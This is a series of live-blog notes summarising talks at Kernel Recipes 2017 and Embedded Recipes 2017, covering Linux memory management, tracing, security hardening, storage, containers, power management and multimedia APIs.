userfaultfd allows userspace more visibility and control over page-faulting. It enables postcopy live migration with VMs (efficient snapshotting). It can be used to drop write bits for with JITs, and has many other uses.

Andrea concluded that he is amazed with the room for innovation to continue further improvements, after 20 years of working with the Linux memory management.

An introduction to the Linux DRM subsystem

by Maxime Ripard

Presentation slides

In the beginning, there was the framebuffer. That's how fbdev was born, to do very basic graphics handling. Then, GPUs came along, getting bigger and bigger. In parallel in the embedded space, piles of hack were accumulated in display engines to accelerate some operations.

At first, DRM was only for GPUs' needs, without any kind of modesetting. It required to map device registers to userspace so that it would do it. But since Kernel Mode-Setting (KMS), this has moved back into the kernel.

fbdev is now obsolete, and dozens of ARM drm drivers have been merged since 2011.

Traditionally in embedded devices, there were two completely different devices for the GPU and the display engine. In Linux, there's the divide between DRM and KMS.

KMS has planes, that can be used for double-buffering. It also has the CRTC, that does the composition. Encoders take the raw data from the CRTC, and convert it to a useful hardware bus format (HDMI, VGA). Connectors output the data, handle hotplug events and EDIDs.

In the DRM stack, GEM can be used to allocate and share buffers without copy with the kernel. PRIME can interact with GEM and dma-buf to also handle buffers shared with hardware.

Vendors also have their own solutions, like ARM's Mali proprietary driver. Blob access for userspace is tightly controlled.

Build farm again

by Willy Tarreau

This is a followup of last year's presentation. The old build farm had shortcomings: it wasn't reliable (HDMI sticks), had a bad power supply, and heating issues. Yet the RK3288 was quite powerful, so Willy wanted to try again with the same CPU.

He got 10 MiQi boards, which are even faster thanks to dual-channel DDR3, although still having shortcomings when combining them with foam. Willy fixed the heatsink, by using a 3M thermal tape. Instead of microUSB, Willy simply soldered thicker cables directly on the board. And to solve the switch attrition issue, he tried a Clearfog-A1 board.

distcc was updated to the latest version for more flexibility, and bumped settings in order to saturate all the cores on all CPUs. LZO compression helped reducing upload time. He also found that there was a hardcoded limit of 50 parallel jobs in distcc, and fixed it.

He improved the distcc distribution using haproxy in front with the leastconn algorithm, this helped a lot.

Using the cluster in addition to his local beefy machine, he went from 13 minutes for kernel builds to 4m45s.

To help with monitoring, Willy submitted a new led-activity LED trigger for the kernel to change the blinking speed depending on CPU usage.

To build haproxy, he went from 11s to 3s with the added farm. With up to 200 builds a day, it saves less than half an hour per day.

Feedback was sent to MiQi's maker; patches to distcc. The quest for a good USB power supply continues. Willy is now exploring alternative boards for even faster builds.

(That's it for Kernel Recipes 2017! See you next year!)

Kernel Recipes 2017 day 2 notes

2017-09-28T00:00:00+02:00

This is continuation of yesterday's live blog of Kernel Recipes 2017.

Linux Kernel Self Protection Project

by Kees Cook

Presentation slides

The aim of the project is more than protecting the kernel.

Background

Kees' motivation for working on Linux, is the two billion Android devices running a Linux. The majority of those are running a 3.4 kernel.

CVE lifetimes — the time between bug introduction and fix — are pretty long, averaging many years.

Kees says the kernel team is fighting bugs, they are finding them, but just doing that isn't enough. The analogy Kees gave was that the Linux security is in the same place the car industry was in the 60s, where most work done was on making sure the car worked, but not necessarily that they were safe.

Killing bug classes is better than simply fixing bugs. There's some truth in the upstream philosophy that all bugs might be security bugs. Shutting down exploitation targets and methods is more valuable in the long term, even it has a development cost.

Modern exploit chains are built on a series of bugs, and just breaking the chain at one point is enough to stop or delay exploitation.

There are many out-of-tree defenses that have existed over the years: PaX/grsec, or many articles presenting novel methods that were never merged upstream. Being out-of-tree is not anything special, since the development mode in Linux is to fork. Distros integrate custom mitigations, like RedHat's ExecShield, Ubuntu's AppArmor, grsecurity or Samsung's Knox for Android.

But in the end, upstreaming is the way to go, Kees says. It protects more people, reduces maintenance cost, allowing to focus on new work instead of playing catch-up.

Many defenses are the powerful because it's they're not the default, and aren't widly examined. Kees gave an example of custom email server configuration that were very effective to fight spam because they're not the default, otherwise the spammers would adapt.

Kees then showed another example with grsecurity, where the stack clash protection was not upstreamed, not reviewed, and was in the end weaker than the solution finally merged upstream.

Kernel self protection project

In 2015, Kees announced this project because he realized he wouldn't be able to do all the upstreaming work by himself. It is now an industry-wide project, with many contributors.

There are various type of protections: probabilistic protections reduce the probability of success of an exploit. Deterministic protection completely block an exploitation mechanism.

Stack overflow and exhaustion is an example of bug stack that was closed down upstream with vmap stack. Kees is still porting a pax and grsecurity gcc plugin to work on that. The stack canary is essential as well, Kees said. For instance, it mitigates the latest BlueBorne vulnerability.

Integer over/underflow protection went inside the kernel with the new refcount patches. Buffer overflows are mitigated upstream through Hardened user copy or recent FORTIFY_SOURCE integration. Format string injection was mitigated in 3.13 when the %n format option was completely removed.

Kernel pointer leak isn't entirely plugged, despite various fixes. Uninitialized variable was mitigated through porting of the structleak PaX gcc plugin. Kees says it's more than an infoleak, and this might be exploited in some cases.

Use-after-free was mitigated with page zero poisoning in Linux 4.6, and freelist randomization in 4.7 and 4.8.

Exploitation

The basic is to find the kernel in memory (e.g through kernel pointer leaks). To mitigate this, there's various types of kASLR or the ported grsecurity randstruct plugin.

A very basic protection is to make sure executable memory cannot be writable, and this was merged for various architectures a long time ago.

Function pointer overwrite is a very standard exploitation method, and this was mitigated by the pax constify plugin, and then the ro_after_init annotation in the kernel.

Mitigating userspace execution is still a work in progress on x86, but arm64 already fixes for that.

The next stages are mitigating user data reuse, and reused code chunks (ROP), PaX has a RAP closed-source technology to do this.

Understanding the Linux Kernel via ftrace

by Steven Rostedt

Steven started by saying that this talk is really fast, and you should watch it three times to understand it.

Ftrace is an infrastructure with several features. Ftrace is the exact opposite of security hardening: it gives visibility in the kernel, provides instrumentation to do live-kernel patching, and of course rootkits.

Ftrace is already in the kernel. It was usually initially interacted with through debugfs, but it now has its own fs, tracefs, mountable in /sys/kernel/tracing. All files and even documentation are in there, so it's usable through echo and cat because Steve wanted that busybox be enough to control these features. This is were the described files are in the rest of the talk.

The basic file is trace, showing the raw data. Then there's available_tracers. The default tracer is the nop one, which does nothing. The most interesting one is the function tracer, that shows every called function in the kernel. The most beautiful one, according to Steve is the function_graph tracer that follows the call graph.

The tracing_on file controls the writes the ring buffer. Tracing infrastructure is still here, but the ring buffer isn't filled with data. It's there for temporary pauses of tracing.

There are few files that allow limiting ftrace to filter the output: set_ftrace_filter for example matches the function names, and supports glob matching, appending, or clearing.

The file available_filter_functions shows the available functions; it does not include all kernel functions, depending on gcc instrumentation(inline functions, and annotated non-traceable functions (timers, ftrace itself, boot time code).

When using the function tracer, it shows the function calls as well as the parent.

The filter file set_ftrace_pid limits function executed by a given task. If you have multiple threads, it's the thread id.

To trace syscalls, you need to know that the definition macros add a sys_ prefix to the syscall names. If you want to trace the read syscall, you should trace the SyS_read function, because the upper case function comes first. You can find it in the available_filter_functions file.

The set_graph_function filter helps when you want to trace starting from a given point, and follow the call graph, accross function pointer boundaries, giving you insight that's harder to get with just the code. Steven gave an example with the sys_read syscall, where you can know exactly which function is called, even when you have the file_operations structure making code reading harder, but the graph is very clear. You can combine this with set_ftrace_notrace to set a boundary of functions or set_graph_notrace for call graphs you're not interested in, to ease reading the call graph and reduce the ftrace performance impact.

There are many options in the options directory or the trace_options file. Steven likes the func_stack_trace option: it creates a stack trace of traced functions. Be careful, if you don't set a filter, it's going to bring your machine to a knee. Also remember to turn it off when done. sym_offset or sym_addr options show the function relative and absolute locations in memory.

When you set a filter starting with :mod:module_name, it will trace all the functions in a given module.

Function triggers are useful when you want a start a tracing, stop tracing, or even add a stacktrace when a function is it. For example you do set a filter with function_name:stacktrace, and it will give you stacktrace everytime this particular function is called.

When interrupted, you might not want to see the interrupt function graph: there's a default-on option funcgraph-irqs that does just that if you turn it off.

It's possible to limit the graph depth of the function_graph tracers with the max_graph_depth option.

You can also trace with events. The events are listed by subsystems in the events directory. The most commonly used ones are sched, irq or timer families of events. You enable events separately of the specific tracers. If you only want events, use the nop tracer, but this can be combined with the others.

There are two useful options to control event and function tracing: event-fork and function-fork allow to continue tracing children of a traced process.

Finally, Steve introduced the trace-cmd program, that wraps all the custom echos and cats in a single program. trace-cmd has nice tricks to make sure you only stack-trace a single function, and can do all you can do without it with a simpler interface.

Introduction to Generic PM domains

by Kevin Hilman

Two years ago, Kevin did an introduction on various power management subsystems at Kernel Recipes. This talk focuses on PM domains.

The driver model starts with the struct dev_pm_ops. You control the global system suspend through /sys/power/state, and this then calls the appropriate driver callbacks. It's very powerful, but also fragile since any driver failing will stop the whole chain. This is static power management or system-wide suspend.

The focus of this talk is the Dynamic power management, in particular for devices.

Dynamic power management

It starts with runtime PM, a per-device idle mode, one device at a time. It's handled by the driver, based on activity. In this mode, devices are independent, and one device cannot affect other drivers. When using powertop, the "device stats" tell you how long your device is idle.

The runtime PM core keeps a usage count for driver uses. When the count hits 0, the core calls runtime_suspend on a device. If you have a device on a bus_type, it sits between you and the runtime PM core. In driver callbacks, one can ensure context is saved, and the wakeups are enabled, restore context on resume, etc.

PM domains map the architecture of power domains inside modern SoCs, where various hardware blocks are grouped in domains that can be turned on and off independently, to the Linux kernel.

PM domains are similar to bus types in the kernel, but orthogonal since some devices might be in the same domain but different buses.

genpd

Generic PM domains (genpd) are the reference implementation of PM domains, to be able to do the grouping and actions when a device becomes idle or active.

In order to implement a genpd, you first implement the power_on/power_off function. It's typically messaging a power domain controller on a separate core, but might be related to clock management or voltage regulators. This is then described in a Device Tree node, allowing to reorder domains for different chip revisions.

Power domains have a notion of governors, allowing custom decision making before cutting power. It allows flexibility relative to the ramp up/down delays for example. It is usually implemented in the genpd, but there are two built-in governors like Always-on or Simple QoS governors. You can attach runtime system-wide or per-device QoS constraints to control the governors.

There has been a lot of work recently upstream, like IRQ-safe domains, or always-on domains. Statistics and debug instrumentations were also added recently.

Under discussion is a way to unify CPU and devices power domain management. Upstream is also interested in having a better interaction between static and runtime PM. Support for more complex domains, in order to have the same driver for an IP block whether it's used through ACPI or genpds, is still in the works.

Performance Analysis Superpowers with Linux BPF

by Brendan Gregg

Presentation slides

Boldly starting the presentation with a demo, Brendan showed how to analyze how top works, with funccount and funcslower, kprobe, funcgraph and other ftrace-based tools he wrote.

He then switched to an eBPF frontend called trace, that was used to dig into the arguments of a kernel function. You can leverage eBPF even more with other tools like execsnoop or ext4dist.

eBPF and bcc

BPF comes from network filtering, originally used with tcpdump. It's a virtual machine in the kernel.

BPF sources can be tracepoints, kprobes, or uprobes. It uses the perf event rig buffer for efficiency. You can use maps as an associative array inside the kernel. The general tracing philosophy is to have a very precise filter to only get the data you need, instead of dumping all the data in userspace, and filtering it later.

Many features were added recently to eBPF, and it keeps being improved.

BPF Compiler Collection (BCC) is the most used BPF frontend. It allows you to write BPF program in C instead of assembly, and load the programs. You can then combine this with a python userspace.

bpftrace is a new in-development frontend, with a simple-to-use philosophy.

Installing bcc on your distro is becoming easier as it gets packaged. There are many tools, each with a different use giving visibility into a different kernel part.

Heatmaps are very useful to visualize event distribution. Flamegraphs are also very powerful when combined with kernel stacktraces generation. It's now even possible to merge userspace and kernelspace stacktraces for analysis.

Future work

Support for higher level languages to write BPF programs like ply or bpftrace is in progress.

In conclusion, eBPF is very useful to understand Linux internals, and you should use it.

Kernel ABI Specification

by Sasha Levin

What's an ABI ? ioctls, syscalls, and the vDSO are examples of the Linux ABI.

Sasha repeated the ABI promise from Greg's talk yesterday. The issue, he says, is that kernel lacks tools to detect a broken ABI.

Sometimes basic syscall argument checks are forgotten, and discovered as a security vulnerability. Sometimes, some interfaces have undefined behaviour, making the ABI stability uncertain.

Breakage is sometimes difficult to fix when detected late, because new userspace might depend on the new behaviour.

In the end, some userspace programs like glibc, strace, or syzkaller might rewrite their understanding of the kernel ABI, and those might be out of sync. Man pages might not document everything either, and they're not a real documentation of the ABI Contract.

ABI Contract

Right now it's in the form of kernel code. Unfortunately, code evolves, so it's not an optimal format for this.

The goal is to fix many issues at the same time: ensure backwards compatibility, prevent kernel to userspace errors, document the contract, and encourage re-use. Sasha looked for a format that would only require writing this once, and be machine readable. syzkaller's description looked like a good starting point. He wanted this to be reusable by userspace tools that need this information. And finally, he wanted to use this as a tool to help ABI fixes and fast breakage detection.

It also helps re-assuring the distribution that the ABI promise is really kept. In Sasha's view, it would also greatly help the security aspect of things, since the ABI is the main interface by which the kernel is attacked.

The hard part is to determine the format of this contract, document all syscalls and ioctls and write the tools to test it out.

Sasha already started with a few system calls, and is currently looking for help to get the ball rolling.

Lightning Wireguard talk

by Jason A. Donenfeld

Jason's background is in breaking VPNs. He wanted to create one that was more secure. That's how Wireguard was born.

Wireguard is UDP based, and uses modern cryptographic principles. The goals is to make it simple and auditable. To prove his point, he showed that it clocks at 3900 lines of code, while OpenVPN , Strongswan or SoftEther have between 116730 and 405894 lines of code each.

It uses normal interfaces, added through the standard ip tool. Jason says it's blasphemous because it breaks through the layering assumptions barriers, as opposed to IPsec for example.

A given interface has a 1 to N mapping between Public keys and IP addresses representing the peers. To configure the cryptokey routing, you use the wg tool for now. Once merged, the intention to have this merged into the iproute project.

In Wireguard, the interface appears stateless, while under the hood, session state, connections are handled transparently.

The key distribution between peers is left to userspace.

Wireguard works well with network namespaces. You can for example limit a container to only communicate through a wireguard interface.

As a design principle, wireguard has no parsing. It also won't interact at all with unauthenticated packets, making it un-scannable unless you have the proper peer private key.

Under the hood, it uses the Noise Protocol Framework (used by Whatsapp) by Trevor Perrin, with modern algorithms like Chacha20, Blake2s, etc. It lacks crypto agility, but support a transition path.

To conclude, Jason says that Wireguard is the fastest, and lowest latency available VPN out there.

Modern Key Management with GPG

by Werner Koch

What's new

GnuPG 2.2 was released a few weeks ago, while 2.1 has been around for nearly 3 years. There's now easy key discovery going through key servers to search keys associated with an email address.

You can now use gpg-agent over the network, so that you don't have to upload your private keys to a server.

In the pipeline for version 2.3 is SHA2 fingerprinting, an AEAD mode, and new default algorithms. The goal is also to help upper applications to integrated GPG in there projects. Werner says he also wants to make the Gnuk hardware open usb token easier to buy in Europe. Improving documentation is also planned.

GPG will be moving to ECC. While this is a well researched-field, some curves (specific ECC implementation) have a pretty bad reputation according to Werner, and some of those are required by NIST, or European standards. The new de-facto standard curves are Curve25519 and Curve448-Goldilocks.

An advantage of ECC key signatures is that they are much shorter than RSA signature, and faster to compute for signing. Verification is slower though.

User experience

The command line interface is being improved with new --quick- options, that are simpler to use. There's now a quick command to generate a key, update the expiration time, add subkeys, update your email address (uid), revoke the old address, sign key, verify a key locally for key signing parties.

The main issue with key servers is that they can't map an address to a key. Anyone can publish a key with a given email. The proper way to handle this is through the email server, but this isn't solved yet. Werner's opinion is that the Web-of-Trust is a too complex tool, he believes that Trust On First Use (TOFU) is a better paradigm.

There are two GPG interfaces: one for humans, and one for scripting. You should always use the scripting ones with you programs, it's more stable.

There are now import/export filters in GPG to reduce the size impact of keys with lots of signatures.

You can now ssh-add keys into the gpg-agent. Only caveat, is that in this case, GnuPG is storing the key forever in its private key directory instead of just in memory.

In conclusion, GPG isn't set in stone, and it keeps improving and evolving. The algorithms, user interface, scriptability are getting better.

(That's it for today ! Continue reading on the last day !)

Kernel Recipes 2017 day 1 live-blog

2017-09-27T00:00:00+02:00

Following last year attempt, I'm doing a live blog of Kernel Recipes 6th edition. There's also a live stream at Air Mozilla

What's new in the world of storage for Linux

by Jens Axboe

Jens started with the status of blk-mq conversions: most drivers are now converted: stec, nbd, MMC, scsi-mq, ciss. There are about 15 drivers left, but Jens says it isn't over until floppy.c is converted, re-offering the prize he offered two years ago.

blk-mq scheduling was the only missing feature, in order to tag I/O request, have better flush handling, or help with scalability. To address this, blk-mq-sched was added in 4.11, with the "none" and "mq-deadline" algorithms. 4.12 saw the addition of BFQ and Kyber algorithms.

Writeback throttling is a feature to prevent overwhelming the device with request, to keep peak performance high. It was inspired by the networking Codel algorithm. It was tested with io.go, and proven to improve latency tremendously on both NVMe and hard-drives.

IO polling helps getting faster completion times, but it has a high CPU cost. A hybrid polling as added, adding predictive algorithms in the kernel to be able to wakeup the driver just before the IO completes. The kernel tracks IO completion time, and just sleeps for half the mean, allowing both fast completion time, and less CPU load leading to better power management. This is configurable through sysfs, with the proper fd configuration. Results show that adaptive polling is comparable in completion times with active polling, but with half the CPU cost.

Faster O_DIRECT and Faster IO accounting were also worked on. IO accounting used to be invisible in profiling, but with the huge scaling efforts of the IO stack, it started showing at 1-2% in testing. In synthetic tests, disabling iostat started improving performance greatly. It was rewritten and merged in 4.14.

A new mechanism called Write lifetime hints allows application to signal expected write lifetime with fcntl. It allows giving hint to flash based storage (supported in NVMe 1.3), of the total size of the write, making sure you won't get such a big write amplification associated with the internal Flash Translation Layer (FTL), when you do big writes. The device might make more intelligent decisions, better garbage collection internally. It showed improvements with RocksDB benchmarks.

IO throttling was initially tied to CFQ, which isn't ideal with the new blk-mq framework. It now scales better on SSDs, supports cgroup2, and was merged for 4.10.

Jens came back to a slide of 2015 Kernel Recipes were he predicted the future work, and all the feature previously discussed in this talk were completed in the two-year timespan.

In the future, IO determinism is going to be focus of work, as well as continuous performance improvements.

Testing on device with LAVA

by Olivier Crête

Continuous integration is as simple as "merge early, merge often" Olivier says. But the core of the value is more in Continuous Testing, and that's what most people think when they say CI.

Upstream kernel code is properly reviewed, so why should it be tested, Olivier asked. Unfortunately, arm boards aren't easy to test, so the kernel used to rely on users to do the testing.

That's until kernelci.org came along, doing thousands of compiles and boots every day, catching a lot of problems. kernelci.org is very good at breadth of testing, but not depth. If you have any serious project, you should do your own testing, with your own hardware and patches.

Unfortunately, automation isn't ubiquitous, because the perceived value is low compared to cost. To overcome this, the first thing to have is a standardized build, single click build system, with no manual operation. The build infrastructure should be the same for everyone, and Olivier recommends using docker images.

The second step is to close the CI loop, which is sending automated messages to the developer on failure as soon as possible. Public infrastructure in Gitlab, github or phabricator have support for CI, as well as blocking merging of anything that breaks the build.

LAVA

Linaro Automation and Validation Architecture (LAVA) is not a CI system. It just focuses on board management, making testing them easier. It can install images, do power control, supports serial, ssh, etc. It's packaged for Debian and has docker images available. It should be combined with CI system like Jenkins.

The first thing to have is to have a way to Power on/off a board. You can find various power switch relay boards from APC, Energenie, devantech, or even other USB relays.

LAVA supports different bootloaders: u-boot, fastboot, and others. The best strategy is to configure the bootloader for network booting.

Lava is configured with a jinja2 template format, where you set various variables for the commands you need to connect to, reset, power on/off the board.

Tests are defined by YAML files, and can be submitted directly through the API or via command line tools like lava-tool, lqa, etc. You specify the name of the job, timeouts, visibility, priority, and a list of actions to do.

Conclusion

You should do CI, Olivier says. It requires a one-time investment, and saves a lot of time in the end. According to Olivier, from nothing, a LAVA+Jenkins setup is at most two days of work. Adding a new board to an infrastructure, is done in one or two hours.

Container FS interfaces

by James Bottomley

After an introduction on virtualization, hypervisor OSes. Within linux, there are two hypervisor OSes: Xen and kvm. Both use Qemu to emulate most devices, but they differ in approach. Xen introduced para-virtualization, modifying the OS to enhance emulation. But hardware advancements killed para-virt, except in a few devices. In James' opinion, the time lost in working with paravirt in Linux made it lose the enterprise virtualization market to VMWare.

Container "guests" just run on the same kernel: there is one kernel that sees everything. The disadvantage is that you can't really run Windows on Linux.

The container interface is mostly cgroups and namespaces. There are label-based namespaces, the first one being the network namespace. There are mapping namespace, mapping some resources to somewhere else, allowing those to be seen differently, like the PID namespace, which can map a given PID on the host to be PID 1 inside the container.

Containers are used in Mesos, LXC, docker, and they all use the same cgroups and namespaces standard kernel API. There many sorts of cgroups(block IO, CPU, devices, etc.), but aren't a focus of the talk. James intends to focus on namespaces instead.

James claims that you don't need any of the "user-friendly" systems, and you can just use the clone, unshare, and standard kernel syscall API to configure namespaces.

Namespaces

User namespaces are the tying it all together, allowing to run as root inside a contained environment. When you buy a machine in the cloud, you expect to run stuff on it as root. Since they give enhanced privileges to the user, the user namespaces were unfortunately the source of a lot of exploits, although there weren't any serious security breach recently since 3.14, James said.

User namespaces also maps uids; in Linux, the shadow-utils provides a newuidmap and newgidmap for this. The user namespace hides unmapped uids, so they are inaccessible, even to "root" in the namespace. This creates an issue since a container image will mostly have the files with uid 0, which then should be mapped to the real kuid, and the fsuid accross the userspace/kernel/storage boundary.

In kernel 4.8, the superblock namespace was added to allow plugging a usb key or running a FUSE driver in a container. But to be useful, you need a superblock, which isn't useful with bind maps, because you only have one superblock per underlying device.

The mount namespace works by cloning the tree of mounts when you do unshare --mount; at first it's identical to the original one, but once you modify it it's different. But, all the modified mounts point to the same refcounted super_block structure. It might create issues when you add new mounts inside a sub-namespace, then this locks the other refcounted super_blocks from the host until you can umount the new mount, like the usb key you plugged in your container, that completely locks the mount namespace trees.

James then did a demo, showing with unshare that if you first create a user namespace, you can then create mount namespaces, despite being unable to do it before entering the user namespace. It shows how you can elevate you privileges with user namespaces, despite not being root, from an outside view.

It was then showed how you can create a file that is really owned by root by manipulating the mount points inside the user/mount namespace by using marks with shiftfs.

shiftfs isn't yet upstream, and other alternatives are being explored to solve the issues brought by the container world.

Refactoring the Linux kernel

by Thomas Gleixner

The main motivation for Thomas' refactoring over the years was to get the RT patch in the kernel, and to get rid of the annoyances.

CPU Hotplug

One of his pet peeves is the CPU hotplug infrastructure. At first, the notifier design was simple enough for the needs, but it had its quirks, like the uninstrumented locking evading lockdep, or the obscure ordering requirements.

While CPU hotplug was known to be fragile, people kept applying duct tape on top of it, which just broke down when the RT patch started adding hotplug support. After ten years, in 2012, Thomas attempted to rewrite it but ran out of spare time. He picked it up again in 2015 and it was finalized in 2017.

It started by analysing all notifiers, and adding instrumentation and documentation in order to explicit the order requirements. Then, one by one the notifiers were converted to states.

The biggest rework, was that of the locking. Adding lockdep coverage unearthed at least 25 deadlock bugs, and running Steven Rostedt's cpu-hotplug stress test tool could find one in less than 10 minutes. Answering a question from Ben Hutchings in the audience, Thomas said that these fixes are unfortunately very hard to backport, leaving old kernel with the races and locks.

The lessons learned are that if you find a bug, you expected to fix them. Don't rely on upstream to do that for you. There's a lot of bad code in the kernel, so don't assume you've seen the worse yet. You also shouldn't give up if you have to rewrite more things. Estimation in this context is very hard, and the original estimation of task was off by factor of three. In the end, the whole refactoring took 2 years, with about 500 patches in total.

Timer wheel

Its base concept was implemented in 1997, and extended over time. The purpose initially the base for all sort of timers, mostly for timeouts after 2005.

Those timeouts aren't triggered most of the time, but re-cascading them caused a lot of performance issues for timers that would get canceled immediately after re-cascading. This is a process that holds a spin-lock with interrupts disabled, and therefore very costly.

It took a 3 month effort to analyze the problem, then 2 month for a design and POC phase, followed by 1 month for implementation, posting and review process. Some enhancements are still in-flight.

The conversion was mostly smooth, except for a userspace visible regression that was detected 1 year after the code was merged upstream.

The takeout of this refactoring is to be prepared to do palaeontological research; don't expect anyone to know anything, or even care. And finally, be prepared for late surprises.

Useful tools

Git is the absolute necessary tool for this work, with grep/log and blame. And if you need to dig through historical code, use the tglx/history merged repository.

Coccinelle is also very useful, but it's a bit hard to learn and remember the syntax.

Mail archives are very useful, but they need to be searchable, as well as quilt, ctags, and of course a good espresso machine.

In the end, this isn't for the faint of heart says Thomas. But it brings a lot of understanding on kernel history. It also gives you the skill to understand undocumented code. The hardest part is to fight the "it worked well until now" mentality. But, it is fun, for some definition of fun.

What's inside the input stack ?

by Benjamin Tissoires

Why talk about input, isn't it working already, Benjamin asked. But the hardware makers are creative, and keep creating new devices with questionable designs.

The usages keep evolving as well, with the ubiquitous move to touchscreen devices for example.

Components

The kernel knows about hardware protocols(HID), talks over USB, and sends evdev events to userspace.

libinput was created on top of libevdev "because input is easy"; but it keeps being enhanced after three years, showing the simplicity of the task. It handles fancy things like gestures.

The toolkits use libevdev, but they also handle gestures because of different touchscreen use cases.

On top of that, the apps use toolkits.

The goood, bad and ugly

Keyboards are mostly working, so it's good. Except for that Caps Lock LED in a TTY being broken since UTF-8 support isn't in the kernel.

Mice are old too, so they are a solved problem. Except for those featureful gaming mice, for which the libratbag project was created to configure all the fancy features.

Most touchpads are still using PS/2, but extending the protocol to add support for more fingers. On Windows, the touchpads communicate over i2c (in addition to PS/2). Sometimes the i2c enumeration goes through PS/2, but other times through UEFI.

Security

There were a few security issues, with an issue on Chromebook where they allowed the webapp to inject HID events through the uhid driver, and this enabled exploiting a buffer overflow in the kernel.

In 2016, the MouseJack vulnerability enabled remotely hacking wireless mouses. Which meant you could remotely send key events to a computer. You could also force a device to connect to your receiver. A receiver firmware update was pushed through gnome software for Logitech mouses.

Linux Kernel Release Model

by Greg Kroah-Hartman Slides

While the kernel has 24.7M lines of code in more than 60k files, you only run a small percentage of that at a given time. There's a lot of contributors, and a lot of changes per hour. The rate of change is in fact accelerating.

This is something downstream companies don't realize. They're getting behind faster than ever when not working with upstream.

The release model is now that there's a new release every 2 or 3 months. All releases are stable. This time-based release model works really well.

The "Cambridge Promise", is that the kernel will never break userspace. On purpose. This promise was formalised in 2007, and kept as best as possible.

Version numbers mean nothing. Greg predict that every 4 years, the first number will be incremented, so that's we might see Linux 5.0 in 2019.

The stable kernels are branched after each releases. They have publicly documented rules for what is merged, the most important one is that a patch has to be Linus' tree.

Longterm kernels are special stable versions, selected once a year, that are maintained for at least 2 years. This rule is now even applied by Google for every future Android device. This makes Greg thinks he might want to maintain some of those kernels for a longer time. Since people care, the longterm kernels also have a higher rate of bugfixes.

Greg says you should always have a mechanism to update your kernel (and OS). What if you can't ? Blame your SoC provider. He took for example a Pixel phone, where there's a 2.8M patch to mainline, for a total of 3.2M lines of running code. 88% of the running code isn't reviewed. It's very hard to maintain and update.

Greg's stance is that all bugs can eventually be a "security" issue. Even a benign fix might become a security fix years later once someone realizes the security implications. Which is why you should always update to your latest stable kernel, and apply fixes as soon as possible.

In conclusion, Greg says to take all stable kernel updates, and enable hardening features. If you don't use a stable/longterm kernel, your device is insecure.

Lightning talks

Fixing Coverity Bugs in the Linux Kernel

by Gustavo A. R. Silva

Coverity is a static source code analyzer. There are currently around 6000 issues reported by the tool for the Linux kernel; those are sorted in different categories.

The first category is illegal memory access, followed by the medium category.

Gustavo first worked on a missing break in a switch in the usbtest driver. Gustavo sent first a patch to fix the issue, then a second one to refactor the code following advices from the maintainer.

Then he worked on arguments sent in the wrong order in scsi drivers. Following was an uninitialized scalar variable, and others. Gustavo showed many examples with obvious commenting or logic bugs.

Tracking exactly which bugs were fixed was really useful to take note of similar issues. He sent in total more than 200 patches in three months, in twenty-six different subsystems.

Software Heritage: Our Software Commons, Forever

by Nicolas Dandrimont

Open Source Software is important, Nicolas says. Its history is part of our heritage.

Code disappears all the time, whether maliciously, or when a service like Google Code is shut down.

Software Heritage is a project an open project to preserve all the open source code ever available. The main targets are VCS repositories, and source code releases. Everything is archived in the most (VCS)agnostic data model possible.

The project heritage fetches the source code from many sources, and then deduplicates it using a Merkle tree. There are currently 3.7B source files from 65M projects. It's already the richest source code archive available, and growing daily.

How to store all of this on a limited budget (100k€ hw budget). It all fits in a single (big) machine. The metadata is stored in PostGres, the files are in filesystems. XFS was selected, and they hit the bottlenecks pretty quickly.

They are thinking of moving to scale-out object storage system like Ceph. The project wants to lower the bar for anyone wanting to do the same thing. They also have plans to use more recent filesystem features.

Software Heritage is currently looking for contributors, sponsors, for this project.

(That's it for day 1! Continued on day 2 and day 3!)

Embedded Recipes 2017 notes

2017-09-26T00:00:00+02:00

Following last year attempt, I'm doing a live blog of Embedded Recipes 1st edition.

Understanding SCHED_DEADLINE

by Steven Rostedt

Every task starts as SCHED_OTHER, where each task gets a fair share of the CPU bandwidth.

Then comes SCHED_FIFO, where it's first in, first out, a task will run until it gives up the CPU. SCHED_RR shouldn't be used said SCHED_FIFO because it works between tasks of the same priority.

Steve gave an example of a machine that runs two tasks, one of a nuclear power plant, and one of a washing machine. The point it to show that priorities should be thought of in a system-wide view when using Rate Monotonic Scheduling. It's not as simple as which task is most important.

Earliest Deadline First (EDF)

Earliest deadline first solves some of the issues of RMS, by allowing to run times without missing deadlines.

Steve explained that sched_yield should never be used because it's almost always buggy. Except when using SCHED_DEADLINE of course, where it can be useful.

Multi processors

Steve then introduced a simple example to show Dhall's effect. It shows you can't get over utilization of 1 when using EDF.

If you want to partition EDF, it becomes similar to the packing problem, which is NP complete. A solution is to use global EDF, which constrains the problem, but can solve a special case, and get more than 1 of utilization when using multiple processors.

The limits of SCHED_DEADLINE

It has to run on all CPUs.

It can not fork, because the tasks has been fixed.

It's very hard to calculate the worst case execution time(WCET), and if you get it wrong, it breaks.

Using cgroups, it's possible to configure SCHEAD_DEADLINE affinity, but it's still a long series of commands, and stuff in /proc to do, but this is being worked on, Steve says.

It's possible to use Greedy Reclaim of Unused Bandwidth (GRUB) in order to utilize bandwidth left by some tasks, leaving more leeway to deal with WCET.

Proper APIs to HW video accelerators

by Olivier Crête

There are various types of codecs: software, hardware, and then hardware accelerators. The last ones are the subject of Olivier's talk.

Codecs can be used in a variety of contexts: players, encoders, streamers, transcoders, VoIP systems, content creation software, etc.

The different use cases have different requirements: Broadcast production want high quality, and user generated content will have lower quality for example.

Video calls care mostly about latency. When transcoding, you might care about latency if you're live, or about quality per bit if you want to store it.

Requirements

Exchange formats on the encoded side might need to support variance in packetization, byte stream, etc.

The raw content might have different subsambling, color space, etc.

Then, the memory layout might vary as well: is it planar (RGBRGBRGB) or packed (RRGGBBRRGGBB) ? Are there multiple planes (multiple DMAbuf fds )? Do you have alignment requirements in memory ? You might have tiled formats, with different tiled formats, compressed in-memory formats, padding, etc.

The memory allocation can be internal or external. In Linux, you mostly care about DMAbuf.

There might be attached metadata, per-frame like timestamps, or Vertical Ancillary Data (VANC): AfD. Inter-frame data like SCTE-35/104, like ad insertion points.

A good API, Olivier says, should support push or pull modes for different uses. A good API should be a living, maintained project, with Open Source code as opposed to being just a specification.

Existing (wrong) solutions

OpenMAX IL is everywhere because it's required by Android. But no one implements the full OpenMAX, only the Android subset, validated through CTS. The spec isn't maintained at Khronos anymore, and the last library passing the full test suite was from 2011. It's a fragmented landscape.

OpenMAX has a specific threading and allocation model. The whole framework isn't a good API according to Olivier.

libv4l is a "transparent" wrapper over the kernel API, but it's tied to the kernel API rules, and has limited maintenance, Olivier says.

